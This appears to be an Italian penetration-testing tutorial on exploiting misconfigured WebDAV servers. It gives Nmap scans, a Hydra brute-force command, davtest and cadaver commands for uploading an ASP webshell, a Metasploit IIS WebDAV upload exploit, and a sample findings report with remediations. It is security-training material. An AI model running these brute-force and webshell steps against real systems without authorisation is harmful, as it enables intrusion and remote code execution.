Exploitation

🔓 WEBDAV EXPLOITATION - GUIDA DETTAGLIATA

🎯 Obiettivo: ottenere accesso remoto tramite WebDAV su server vulnerabile (es. IIS)

1. Scansione Iniziale con Nmap

nmap -sC -sV -p 80,443 <target>
nmap --script http-webdav-scan,http-enum -p 80,443 <target>

• Verifica se WebDAV è attivo e in quale directory.

2. Bruteforce delle Credenziali (Autenticazione 401)

Utilizzare hydra per trovare credenziali valide:

hydra -L users.txt -P passwords.txt <ip> http-get /directory_con_autenticazione/

3. Autenticazione e Upload con strumenti specializzati

#### ▶️ davtest

Testa la possibilità di upload di file tramite WebDAV:

davtest -url http://<ip>/webdav

Con autenticazione:

davtest -auth user:pass -url http://<ip>/webdav

#### ▶️ cadaver

Interagisce con il server WebDAV in modo simile a un FTP client:

cadaver http://<ip>/webdav

Autenticazione all'accesso:

Username: user
Password: pass

Esempio di comando:

put /usr/share/webshells/asp/webshell.asp

#### ▶️ Metasploit

use auxiliary/scanner/http/webdav_scanner
set RHOSTS <target>
run

Oppure eseguire direttamente l'exploit se disponibile:

search type:exploit name:webdav
use exploit/windows/http/iis_webdav_upload_asp
set RHOST <target>
set RPORT 80
set USERNAME <user>
set PASSWORD <pass>
run

4. Verifica della Webshell da Browser

Apri nel browser:

http://<target>/webdav/webshell.asp

Interfaccia per eseguire comandi remoti.

📋 Reportistica (Esempio)

• Servizio: WebDAV

• Porta: 80

• Metodi Abilitati: OPTIONS, GET, PUT, DELETE

• Autenticazione: 401, bypassata con bruteforce

• Vulnerabilità: Upload non autenticato di file ASP

• Impatto: Possibilità di eseguire codice remoto via webshell

• Rimedi: Disabilitare metodi pericolosi, usare autenticazione forte, segmentazione rete

🔎 Note Finali

WebDAV, se protetto da credenziali deboli o configurato in modo errato, può diventare una via semplice ma potente per compromettere un sistema Windows. Verificare sempre se è in uso e testarne correttamente le funzionalità.